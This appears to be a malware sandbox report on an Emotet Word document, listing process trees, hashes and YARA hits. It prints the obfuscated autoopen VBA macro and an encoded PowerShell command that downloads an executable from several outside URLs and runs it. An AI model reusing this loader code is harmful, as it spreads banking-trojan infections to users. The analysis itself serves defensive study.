MD5 hash:	BD2AE15EFB47E5215B4D0C59EA00C91A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: sortedwatched.exe PID: 3732 Parent PID: 416

General

Start time:	13:29:59
Start date:	20/09/2019
Path:	C:\Windows\System32\sortedwatched.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sortedwatched.exe
Imagebase:	0x400000
File size:	425472 bytes
MD5 hash:	3A74A93E7831D0953B5CEFB9C98505F1
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Emotet, Description: detect Emotet in memory, Source: 00000009.00000002.323191242.005A3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Emotet, Description: detect Emotet in memory, Source: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: sortedwatched.exe PID: 3704 Parent PID: 3732

General

Start time:	13:29:59
Start date:	20/09/2019
Path:	C:\Windows\System32\sortedwatched.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sortedwatched.exe
Imagebase:	0x400000
File size:	425472 bytes
MD5 hash:	3A74A93E7831D0953B5CEFB9C98505F1
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Emotet, Description: detect Emotet in memory, Source: 0000000A.00000002.322151721.00400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Emotet, Description: detect Emotet in memory, Source: 0000000A.00000001.321515804.00400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: sortedwatched.exe PID: 3672 Parent PID: 3704

General

Start time:	13:30:01
Start date:	20/09/2019
Path:	C:\Windows\System32\sortedwatched.exe
Wow64 process (32bit):	false
Commandline:	--2a75e385
Imagebase:	0x400000
File size:	425472 bytes
MD5 hash:	3A74A93E7831D0953B5CEFB9C98505F1
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Emotet, Description: detect Emotet in memory, Source: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Emotet, Description: detect Emotet in memory, Source: 0000000B.00000002.327425390.005B3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: sortedwatched.exe PID: 3780 Parent PID: 3672

General

Start time:	13:30:01
Start date:	20/09/2019
Path:	C:\Windows\System32\sortedwatched.exe
Wow64 process (32bit):	false
Commandline:	--2a75e385
Imagebase:	0x400000
File size:	425472 bytes
MD5 hash:	3A74A93E7831D0953B5CEFB9C98505F1
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Emotet, Description: detect Emotet in memory, Source: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Emotet, Description: detect Emotet in memory, Source: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: JIodCjfv

Declaration

Line	Content
1	Attribute VB_Name = "JIodCjfv"

Executed Functions

Subroutine autoopen, APIs: 165, Strings: 0, Number of lines: 27, Relevance: 249.027

APIs	Meta Information
xqmm6672
wqLToroz
Na5naWHG
Tan
ol1JHUw
CDate
tHW47ffa
Hj82oV
CDHkaIfU
HZGOlw
CStr
EO5s3Wov
ruLzmW
NAJ70I4
Xfh3Uz
ChrW
Oct
CDate
Fix
ZBpK33S
EnmJEs2
RRZ6BWC
Sin
Frj8OZbd
fXaz2u
D5Yzqc
Count
RecentFiles
Part of subcall function dztj37@snLF1V: xqmm6672
Part of subcall function dztj37@snLF1V: M3oCwG
Part of subcall function dztj37@snLF1V: PFAGKSc
Part of subcall function dztj37@snLF1V: Tan
Part of subcall function dztj37@snLF1V: Btc0KuW
Part of subcall function dztj37@snLF1V: CDate
Part of subcall function dztj37@snLF1V: fCMUHn
Part of subcall function dztj37@snLF1V: pUBdAcb
Part of subcall function dztj37@snLF1V: WLAEkzsu
Part of subcall function dztj37@snLF1V: z5_aQ54
Part of subcall function dztj37@snLF1V: CStr
Part of subcall function dztj37@snLF1V: q2NS516
Part of subcall function dztj37@snLF1V: uBRAVT
Part of subcall function dztj37@snLF1V: tkw6vj
Part of subcall function dztj37@snLF1V: oc2GT0i
Part of subcall function dztj37@snLF1V: ChrW
Part of subcall function dztj37@snLF1V: Oct
Part of subcall function dztj37@snLF1V: CDate
Part of subcall function dztj37@snLF1V: Fix
Part of subcall function dztj37@snLF1V: FRqJIU
Part of subcall function dztj37@snLF1V: MAPHFj
Part of subcall function dztj37@snLF1V: A9hSFQf9
Part of subcall function dztj37@snLF1V: Sin
Part of subcall function dztj37@snLF1V: Bt4u6CG
Part of subcall function dztj37@snLF1V: PcG7it_
Part of subcall function dztj37@snLF1V: zir7hM
Part of subcall function dztj37@snLF1V: vq219c
Part of subcall function dztj37@snLF1V: zJWspwz
Part of subcall function dztj37@snLF1V: VHfL_K2S
Part of subcall function dztj37@snLF1V: YAHvQ_
Part of subcall function dztj37@snLF1V: xqmm6672
Part of subcall function dztj37@snLF1V: LXv84MXp
Part of subcall function dztj37@snLF1V: JSjBjs
Part of subcall function dztj37@snLF1V: Tan
Part of subcall function dztj37@snLF1V: TAw0Fzm
Part of subcall function dztj37@snLF1V: CDate
Part of subcall function dztj37@snLF1V: C0DzNIbd
Part of subcall function dztj37@snLF1V: dpjKqtAS
Part of subcall function dztj37@snLF1V: iaXsMY1
Part of subcall function dztj37@snLF1V: TniCd0t
Part of subcall function dztj37@snLF1V: CStr
Part of subcall function dztj37@snLF1V: k5bY2L
Part of subcall function dztj37@snLF1V: t1HQFfiz
Part of subcall function dztj37@snLF1V: BnCM82w
Part of subcall function dztj37@snLF1V: ZNRIEN
Part of subcall function dztj37@snLF1V: ChrW
Part of subcall function dztj37@snLF1V: Oct
Part of subcall function dztj37@snLF1V: CDate
Part of subcall function dztj37@snLF1V: Fix
Part of subcall function dztj37@snLF1V: Ghn4llZ
Part of subcall function dztj37@snLF1V: UF1nKaU6
Part of subcall function dztj37@snLF1V: wDZDIUTV
Part of subcall function dztj37@snLF1V: Sin
Part of subcall function dztj37@snLF1V: L8Zz21
Part of subcall function dztj37@snLF1V: lnY3HW
Part of subcall function dztj37@snLF1V: jXUw9Oz
Part of subcall function dztj37@snLF1V: Create
Part of subcall function dztj37@snLF1V: ZKnIZEfd
Part of subcall function dztj37@snLF1V: khjUo3du
Part of subcall function dztj37@snLF1V: xqmm6672
Part of subcall function dztj37@snLF1V: wWOoNnTo
Part of subcall function dztj37@snLF1V: MSfBRT
Part of subcall function dztj37@snLF1V: Tan
Part of subcall function dztj37@snLF1V: z5liGH
Part of subcall function dztj37@snLF1V: CDate
Part of subcall function dztj37@snLF1V: TuYSA6
Part of subcall function dztj37@snLF1V: KWit9B
Part of subcall function dztj37@snLF1V: tqXjFCw
Part of subcall function dztj37@snLF1V: pSZQnNn
Part of subcall function dztj37@snLF1V: CStr
Part of subcall function dztj37@snLF1V: wT5D9BcE
Part of subcall function dztj37@snLF1V: wMR9tP
Part of subcall function dztj37@snLF1V: LDjJ6zM
Part of subcall function dztj37@snLF1V: bUqA9z5
Part of subcall function dztj37@snLF1V: ChrW
Part of subcall function dztj37@snLF1V: Oct
Part of subcall function dztj37@snLF1V: CDate
Part of subcall function dztj37@snLF1V: Fix
Part of subcall function dztj37@snLF1V: jYQWvaN
Part of subcall function dztj37@snLF1V: vDZE63w
Part of subcall function dztj37@snLF1V: UYGTL2Tr
Part of subcall function dztj37@snLF1V: Sin
Part of subcall function dztj37@snLF1V: CmXBWjb
Part of subcall function dztj37@snLF1V: X975_m
Part of subcall function dztj37@snLF1V: zcazMGDf
Part of subcall function dztj37@snLF1V: xqmm6672
Part of subcall function dztj37@snLF1V: Pu1R8IUO
Part of subcall function dztj37@snLF1V: aXF2_4qQ
Part of subcall function dztj37@snLF1V: Tan
Part of subcall function dztj37@snLF1V: tcDLLb
Part of subcall function dztj37@snLF1V: CDate
Part of subcall function dztj37@snLF1V: lsaWRUr
Part of subcall function dztj37@snLF1V: ShWp3jNB
Part of subcall function dztj37@snLF1V: tnXUzJ0O
Part of subcall function dztj37@snLF1V: MM3V6h
Part of subcall function dztj37@snLF1V: CStr
Part of subcall function dztj37@snLF1V: GdQwslU
Part of subcall function dztj37@snLF1V: j_72KM
Part of subcall function dztj37@snLF1V: HpAvVal
Part of subcall function dztj37@snLF1V: cLEAWn
Part of subcall function dztj37@snLF1V: ChrW
Part of subcall function dztj37@snLF1V: Oct
Part of subcall function dztj37@snLF1V: CDate
Part of subcall function dztj37@snLF1V: Fix
Part of subcall function dztj37@snLF1V: lA6KKk
Part of subcall function dztj37@snLF1V: J3J3pfPR
Part of subcall function dztj37@snLF1V: hzkYTP82
Part of subcall function dztj37@snLF1V: Sin
Part of subcall function dztj37@snLF1V: cISYkJs
Part of subcall function dztj37@snLF1V: Sff8wzaz
Part of subcall function dztj37@snLF1V: B8wUj_W
xqmm6672
whapPJb
ow8oQWti
Tan
YcqUOCsQ
CDate
OkzDrVT
CBH1HB
mzTRZThP
ATaMOL
CStr
bQrbmIrJ
SnjS4W9c
i2w7lPf
lbDPzY6
ChrW
Oct
CDate
Fix
w3wS1B
zaBTww
Mntl4i7
Sin
dOmmAiqP
Fi6Vjz
XZJ7qqlh

Line	Instruction	Meta Information
2	Sub autoopen()
3	On Error Resume Next	executed
4	Set mna = xqmm6672	xqmm6672
5	Do	fXaz2u D5Yzqc
6	If wqLToroz = Na5naWHG Then	wqLToroz Na5naWHG
7	PhaBus1_ = Tan(1141)	Tan
8	Endif
9	qNXwDA = ol1JHUw * CDate(tHW47ffa) / Hj82oV / CDHkaIfU + (HZGOlw / CStr(EO5s3Wov) / 3 * CStr(ruLzmW))	ol1JHUw CDate tHW47ffa Hj82oV CDHkaIfU HZGOlw CStr EO5s3Wov ruLzmW
10	For Each oSsOXl in NAJ70I4	NAJ70I4
11	OEVLv8 = Xfh3Uz - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(ZBpK33S) - 6977 - EnmJEs2 - RRZ6BWC * Sin(Frj8OZbd)	Xfh3Uz ChrW Oct CDate Fix ZBpK33S EnmJEs2 RRZ6BWC Sin Frj8OZbd
12	Next	NAJ70I4
13	Loop Until fXaz2u = D5Yzqc	fXaz2u D5Yzqc
14	If RecentFiles.Count > 3 Then	Count RecentFiles
15	dztj37
16	Endif
17	On Error Resume Next
18	Set mna = xqmm6672	xqmm6672
19	Do	Fi6Vjz XZJ7qqlh
20	If whapPJb = ow8oQWti Then	whapPJb ow8oQWti
21	cc6fSzI = Tan(1141)	Tan
22	Endif
23	nI9cqO = YcqUOCsQ * CDate(OkzDrVT) / CBH1HB / mzTRZThP + (ATaMOL / CStr(bQrbmIrJ) / 3 * CStr(SnjS4W9c))	YcqUOCsQ CDate OkzDrVT CBH1HB mzTRZThP ATaMOL CStr bQrbmIrJ SnjS4W9c
24	For Each sRRzpU in i2w7lPf	i2w7lPf
25	QMKkQZu4 = lbDPzY6 - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(w3wS1B) - 6977 - zaBTww - Mntl4i7 * Sin(dOmmAiqP)	lbDPzY6 ChrW Oct CDate Fix w3wS1B zaBTww Mntl4i7 Sin dOmmAiqP
26	Next	i2w7lPf
27	Loop Until Fi6Vjz = XZJ7qqlh	Fi6Vjz XZJ7qqlh
28	End Sub

Function R3tnEz2D, APIs: 163, Strings: 0, Number of lines: 49, Relevance: 246.049

APIs	Meta Information
kULEiwf
DAbbE9mG
xqmm6672
f1ocqu
wZfG2P
Tan
DtWubh
CDate
NdN1rET
NosNmj4
kZ3OzYB
TtIw36Hv
CStr
pkcNH7C
rbJdmEz
ZwwF3I
qcOQjrD
ChrW
Oct
CDate
Fix
mwv_hRR
cCsukAJS
T4t4PSN
Sin
WrztcmHX
N06UkOi
sNGNZi
CreateObject	CreateObject("winmgmts:Win32_ProcessStartup")
lTzGN9z
Part of subcall function UMvDUH@snLF1V: xqmm6672
Part of subcall function UMvDUH@snLF1V: CP2pOzYD
Part of subcall function UMvDUH@snLF1V: m_MLhXX
Part of subcall function UMvDUH@snLF1V: Tan
Part of subcall function UMvDUH@snLF1V: huhEoJG
Part of subcall function UMvDUH@snLF1V: CDate
Part of subcall function UMvDUH@snLF1V: az_UGd0
Part of subcall function UMvDUH@snLF1V: a21jZbL3
Part of subcall function UMvDUH@snLF1V: pn7zEK
Part of subcall function UMvDUH@snLF1V: N0vGGku
Part of subcall function UMvDUH@snLF1V: CStr
Part of subcall function UMvDUH@snLF1V: fMoOoWO3
Part of subcall function UMvDUH@snLF1V: EUG4z12
Part of subcall function UMvDUH@snLF1V: nP1obkp
Part of subcall function UMvDUH@snLF1V: HG0RQi
Part of subcall function UMvDUH@snLF1V: ChrW
Part of subcall function UMvDUH@snLF1V: Oct
Part of subcall function UMvDUH@snLF1V: CDate
Part of subcall function UMvDUH@snLF1V: Fix
Part of subcall function UMvDUH@snLF1V: zqDQZ7
Part of subcall function UMvDUH@snLF1V: YjRQrq
Part of subcall function UMvDUH@snLF1V: Hz5p3D
Part of subcall function UMvDUH@snLF1V: Sin
Part of subcall function UMvDUH@snLF1V: mjjrHIf
Part of subcall function UMvDUH@snLF1V: Xb5lam
Part of subcall function UMvDUH@snLF1V: diSWXniz
Part of subcall function UMvDUH@snLF1V: Replace
Part of subcall function UMvDUH@snLF1V: xqmm6672
Part of subcall function UMvDUH@snLF1V: wMBYtY
Part of subcall function UMvDUH@snLF1V: O_vT8j
Part of subcall function UMvDUH@snLF1V: Tan
Part of subcall function UMvDUH@snLF1V: EqHGmqzs
Part of subcall function UMvDUH@snLF1V: CDate
Part of subcall function UMvDUH@snLF1V: p2VQvUjT
Part of subcall function UMvDUH@snLF1V: nJES0LA
Part of subcall function UMvDUH@snLF1V: WiwqHbr
Part of subcall function UMvDUH@snLF1V: XzCzPS7
Part of subcall function UMvDUH@snLF1V: CStr
Part of subcall function UMvDUH@snLF1V: FfJUME
Part of subcall function UMvDUH@snLF1V: wlzHbq
Part of subcall function UMvDUH@snLF1V: t3Fh05z
Part of subcall function UMvDUH@snLF1V: aGJjAH
Part of subcall function UMvDUH@snLF1V: ChrW
Part of subcall function UMvDUH@snLF1V: Oct
Part of subcall function UMvDUH@snLF1V: CDate
Part of subcall function UMvDUH@snLF1V: Fix
Part of subcall function UMvDUH@snLF1V: F97Z_Sb
Part of subcall function UMvDUH@snLF1V: Q0hGCzd
Part of subcall function UMvDUH@snLF1V: ojvDCQi
Part of subcall function UMvDUH@snLF1V: Sin
Part of subcall function UMvDUH@snLF1V: wNX30a
Part of subcall function UMvDUH@snLF1V: qaB0m7mo
Part of subcall function UMvDUH@snLF1V: E9cRqzhV
QFa7Tzv
RI34Jc
xqmm6672
ZD4NzNKp
dYFvGWI
Tan
OObwzR
CDate
EIw3Db08
T1TAVR_L
SXvvII2T
S1hkHVH
CStr
a1QujnI
uJwlJz
Pt5_Krw
mjvrs8a
ChrW
Oct
CDate
Fix
df7KLz
rLX5_E
qhEL6us
Sin
RWp2lz
DHQs26
CKCNjv
xqmm6672
hUPJJL
oihAvpA
Tan
DkkCTnu
CDate
mQZoi014
uNL_Qm
EhPXLwZr
fzbTzG6
CStr
T6H6cL
U4kTbL8o
rkbEFdX
Iofqhj
ChrW
Oct
CDate
Fix
fIDOjLzQ
qf2EbLqm
AuOCYR
Sin
R65fhvwm
FnZwmD_A
KUA7zY
xqmm6672
ls9iOFd
EnzDZGz
Tan
AtZoc6
CDate
uDNHZRDB
MLzjlI
OuoioTjO
h0IdWK
CStr
Gtz6Hz
NWWiIQQi
S10zzpNS
j7Ysl2IC
ChrW
Oct
CDate
Fix
LInuIc64
jR1PlbP
cn3bSi
Sin
GY7qmRZw
hfW56jn
FJHJlhv

Line	Instruction	Meta Information
29	Function R3tnEz2D()
30	ZfdJRPiY = kULEiwf + DAbbE9mG	kULEiwf DAbbE9mG executed
31	On Error Resume Next
32	Set mna = xqmm6672	xqmm6672
33	Do	N06UkOi sNGNZi
34	If f1ocqu = wZfG2P Then	f1ocqu wZfG2P
35	EE3NY5nB = Tan(1141)	Tan
36	Endif
37	jQhhhQSc = DtWubh * CDate(NdN1rET) / NosNmj4 / kZ3OzYB + (TtIw36Hv / CStr(pkcNH7C) / 3 * CStr(rbJdmEz))	DtWubh CDate NdN1rET NosNmj4 kZ3OzYB TtIw36Hv CStr pkcNH7C rbJdmEz
38	For Each BpzwCL7 in ZwwF3I	ZwwF3I
39	oPMvTw = qcOQjrD - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(mwv_hRR) - 6977 - cCsukAJS - T4t4PSN * Sin(WrztcmHX)	qcOQjrD ChrW Oct CDate Fix mwv_hRR cCsukAJS T4t4PSN Sin WrztcmHX
40	Next	ZwwF3I
41	Loop Until N06UkOi = sNGNZi	N06UkOi sNGNZi
42	Set R3tnEz2D = CreateObject(lTzGN9z + UMvDUH(ThisDocument.QFa7Tzv) + RI34Jc)	CreateObject("winmgmts:Win32_ProcessStartup") lTzGN9z QFa7Tzv RI34Jc executed
43	On Error Resume Next
44	Set mna = xqmm6672	xqmm6672
45	Do	DHQs26 CKCNjv
46	If ZD4NzNKp = dYFvGWI Then	ZD4NzNKp dYFvGWI
47	FIHNkM = Tan(1141)	Tan
48	Endif
49	Jd7zMAU_ = OObwzR * CDate(EIw3Db08) / T1TAVR_L / SXvvII2T + (S1hkHVH / CStr(a1QujnI) / 3 * CStr(uJwlJz))	OObwzR CDate EIw3Db08 T1TAVR_L SXvvII2T S1hkHVH CStr a1QujnI uJwlJz
50	For Each TCu6kpE7 in Pt5_Krw	Pt5_Krw
51	FnLI_N = mjvrs8a - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(df7KLz) - 6977 - rLX5_E - qhEL6us * Sin(RWp2lz)	mjvrs8a ChrW Oct CDate Fix df7KLz rLX5_E qhEL6us Sin RWp2lz
52	Next	Pt5_Krw
53	Loop Until DHQs26 = CKCNjv	DHQs26 CKCNjv
54	R3tnEz2D.ShowWindow! = ZfdJRPiY
55	On Error Resume Next
56	Set mna = xqmm6672	xqmm6672
57	Do	FnZwmD_A KUA7zY
58	If hUPJJL = oihAvpA Then	hUPJJL oihAvpA
59	CCj5oD = Tan(1141)	Tan
60	Endif
61	YGuUZX = DkkCTnu * CDate(mQZoi014) / uNL_Qm / EhPXLwZr + (fzbTzG6 / CStr(T6H6cL) / 3 * CStr(U4kTbL8o))	DkkCTnu CDate mQZoi014 uNL_Qm EhPXLwZr fzbTzG6 CStr T6H6cL U4kTbL8o
62	For Each SFnP24Y in rkbEFdX	rkbEFdX
63	wnwME5Aw = Iofqhj - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(fIDOjLzQ) - 6977 - qf2EbLqm - AuOCYR * Sin(R65fhvwm)	Iofqhj ChrW Oct CDate Fix fIDOjLzQ qf2EbLqm AuOCYR Sin R65fhvwm
64	Next	rkbEFdX
65	Loop Until FnZwmD_A = KUA7zY	FnZwmD_A KUA7zY
66	On Error Resume Next
67	Set mna = xqmm6672	xqmm6672
68	Do	hfW56jn FJHJlhv
69	If ls9iOFd = EnzDZGz Then	ls9iOFd EnzDZGz
70	iYU6MXV = Tan(1141)	Tan
71	Endif
72	JK1i0j = AtZoc6 * CDate(uDNHZRDB) / MLzjlI / OuoioTjO + (h0IdWK / CStr(Gtz6Hz) / 3 * CStr(NWWiIQQi))	AtZoc6 CDate uDNHZRDB MLzjlI OuoioTjO h0IdWK CStr Gtz6Hz NWWiIQQi
73	For Each FWa6lK in S10zzpNS	S10zzpNS
74	FXnzwzC = j7Ysl2IC - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(LInuIc64) - 6977 - jR1PlbP - cn3bSi * Sin(GY7qmRZw)	j7Ysl2IC ChrW Oct CDate Fix LInuIc64 jR1PlbP cn3bSi Sin GY7qmRZw
75	Next	S10zzpNS
76	Loop Until hfW56jn = FJHJlhv	hfW56jn FJHJlhv
77	End Function

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True
9	Attribute VB_Control = "FikbdQZ, 0, 0, MSForms, TextBox"
10	Attribute VB_Control = "N2SpOiID, 1, 1, MSForms, TextBox"
11	Attribute VB_Control = "mwXI7m, 2, 2, MSForms, TextBox"
12	Attribute VB_Control = "P83AcXTu, 3, 3, MSForms, TextBox"
13	Attribute VB_Control = "QFa7Tzv, 4, 4, MSForms, TextBox"
14	Attribute VB_Control = "TCRM9sqj, 5, 5, MSForms, TextBox"
15	Attribute VB_Control = "VEYjp2, 6, 6, MSForms, TextBox"
16	Attribute VB_Control = "VHfL_K2S, 7, 7, MSForms, TextBox"
17	Attribute VB_Control = "w6kwiq, 8, 8, MSForms, TextBox"
18	Attribute VB_Control = "hjjzVw, 9, 9, MSForms, TextBox"
19	Attribute VB_Control = "cZDuVz, 10, 10, MSForms, TextBox"
20	Attribute VB_Control = "JSEp1Hh, 11, 11, MSForms, TextBox"
21	Attribute VB_Control = "uXSvzY, 12, 12, MSForms, TextBox"
22	Attribute VB_Control = "GoWsRhk, 13, 13, MSForms, TextBox"
23	Attribute VB_Control = "zJWspwz, 14, 14, MSForms, TextBox"
24	Attribute VB_Control = "kE4iQQr, 15, 15, MSForms, TextBox"
25	Attribute VB_Control = "TRF9Wz, 16, 16, MSForms, TextBox"
26	Attribute VB_Control = "qijkYG, 17, 17, MSForms, TextBox"
27	Attribute VB_Control = "btn5hVS, 18, 18, MSForms, TextBox"
28	Attribute VB_Control = "GUl0LE, 19, 19, MSForms, TextBox"

Module: snLF1V

Declaration

Line	Content
1	Attribute VB_Name = "snLF1V"

Executed Functions

Function dztj37, APIs: 274, Strings: 1, Number of lines: 48, Relevance: 490.048

APIs	Meta Information
xqmm6672
M3oCwG
PFAGKSc
Tan
Btc0KuW
CDate
fCMUHn
pUBdAcb
WLAEkzsu
z5_aQ54
CStr
q2NS516
uBRAVT
tkw6vj
oc2GT0i
ChrW
Oct
CDate
Fix
FRqJIU
MAPHFj
A9hSFQf9
Sin
Bt4u6CG
PcG7it_
zir7hM
vq219c
Part of subcall function UMvDUH@snLF1V: xqmm6672
Part of subcall function UMvDUH@snLF1V: CP2pOzYD
Part of subcall function UMvDUH@snLF1V: m_MLhXX
Part of subcall function UMvDUH@snLF1V: Tan
Part of subcall function UMvDUH@snLF1V: huhEoJG
Part of subcall function UMvDUH@snLF1V: CDate
Part of subcall function UMvDUH@snLF1V: az_UGd0
Part of subcall function UMvDUH@snLF1V: a21jZbL3
Part of subcall function UMvDUH@snLF1V: pn7zEK
Part of subcall function UMvDUH@snLF1V: N0vGGku
Part of subcall function UMvDUH@snLF1V: CStr
Part of subcall function UMvDUH@snLF1V: fMoOoWO3
Part of subcall function UMvDUH@snLF1V: EUG4z12
Part of subcall function UMvDUH@snLF1V: nP1obkp
Part of subcall function UMvDUH@snLF1V: HG0RQi
Part of subcall function UMvDUH@snLF1V: ChrW
Part of subcall function UMvDUH@snLF1V: Oct
Part of subcall function UMvDUH@snLF1V: CDate
Part of subcall function UMvDUH@snLF1V: Fix
Part of subcall function UMvDUH@snLF1V: zqDQZ7
Part of subcall function UMvDUH@snLF1V: YjRQrq
Part of subcall function UMvDUH@snLF1V: Hz5p3D
Part of subcall function UMvDUH@snLF1V: Sin
Part of subcall function UMvDUH@snLF1V: mjjrHIf
Part of subcall function UMvDUH@snLF1V: Xb5lam
Part of subcall function UMvDUH@snLF1V: diSWXniz
Part of subcall function UMvDUH@snLF1V: Replace
Part of subcall function UMvDUH@snLF1V: xqmm6672
Part of subcall function UMvDUH@snLF1V: wMBYtY
Part of subcall function UMvDUH@snLF1V: O_vT8j
Part of subcall function UMvDUH@snLF1V: Tan
Part of subcall function UMvDUH@snLF1V: EqHGmqzs
Part of subcall function UMvDUH@snLF1V: CDate
Part of subcall function UMvDUH@snLF1V: p2VQvUjT
Part of subcall function UMvDUH@snLF1V: nJES0LA
Part of subcall function UMvDUH@snLF1V: WiwqHbr
Part of subcall function UMvDUH@snLF1V: XzCzPS7
Part of subcall function UMvDUH@snLF1V: CStr
Part of subcall function UMvDUH@snLF1V: FfJUME
Part of subcall function UMvDUH@snLF1V: wlzHbq
Part of subcall function UMvDUH@snLF1V: t3Fh05z
Part of subcall function UMvDUH@snLF1V: aGJjAH
Part of subcall function UMvDUH@snLF1V: ChrW
Part of subcall function UMvDUH@snLF1V: Oct
Part of subcall function UMvDUH@snLF1V: CDate
Part of subcall function UMvDUH@snLF1V: Fix
Part of subcall function UMvDUH@snLF1V: F97Z_Sb
Part of subcall function UMvDUH@snLF1V: Q0hGCzd
Part of subcall function UMvDUH@snLF1V: ojvDCQi
Part of subcall function UMvDUH@snLF1V: Sin
Part of subcall function UMvDUH@snLF1V: wNX30a
Part of subcall function UMvDUH@snLF1V: qaB0m7mo
Part of subcall function UMvDUH@snLF1V: E9cRqzhV
zJWspwz
VHfL_K2S
YAHvQ_
xqmm6672
LXv84MXp
JSjBjs
Tan
TAw0Fzm
CDate
C0DzNIbd
dpjKqtAS
iaXsMY1
TniCd0t
CStr
k5bY2L
t1HQFfiz
BnCM82w
ZNRIEN
ChrW
Oct
CDate
Fix
Ghn4llZ
UF1nKaU6
wDZDIUTV
Sin
L8Zz21
lnY3HW
jXUw9Oz
Create	SWbemObjectEx.Create("powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvAEAAaAB0AHQAcABzADoALwAvAGQAbwBnAG8AbgBnAHUAbABvAG4AZwAuAHYAbgAvAHcAcAAtAGEAZABtAGkAbgAvAHYAYQBJAEQAZQB5AEQAagAvACcALgAiAHMAUABgAGwAaQBUACIAKAAnAEAAJwApADsAJABYAG4AOQBUAGoAcQBpAD0AJwBXADUANAA4AEcAUABiAGkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAaQBYAEgAaQBXACAAaQBuACAAJABFAEkAcABTAEcAdwB1ACkAewB0AHIAeQB7ACQAegBfAG4AZgAwADkALgAiAGQAYABvAHcAYABOAGAAbABPAEEARABGAEkAbABlACIAKAAkAEMAaQBYAEgAaQBXACwAIAAkAFEAegBpAEEAQgBCADYATAApADsAJABIAEkAaQBIAFcAVwBTAGYAPQAnAGoASAA4AG8ASQBNACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUQB6AGkAQQBCAEIANgBMACkALgAiAGwAZQBOAGAAZwB0AEgAIgAgAC0AZwBlACAAMwAyADMAOAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgB0ACIAKAAkAFEAegBpAEEAQgBCADYATAApADsAJABLAEMAYgBzAGoAawA9ACcAdwBBAHAATQB2AGEAYQAnADsAYgByAGUAYQBrADsAJAB2AGoAbAA4AFEATAB3AD0AJwBRADgAUAB6ADUAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADEAcwBhAEIAaAA9ACcAUQBpAEIANgA3AHIAaAA0ACcA",,,) -> 0
ZKnIZEfd
Part of subcall function R3tnEz2D@JIodCjfv: kULEiwf
Part of subcall function R3tnEz2D@JIodCjfv: DAbbE9mG
Part of subcall function R3tnEz2D@JIodCjfv: xqmm6672
Part of subcall function R3tnEz2D@JIodCjfv: f1ocqu
Part of subcall function R3tnEz2D@JIodCjfv: wZfG2P
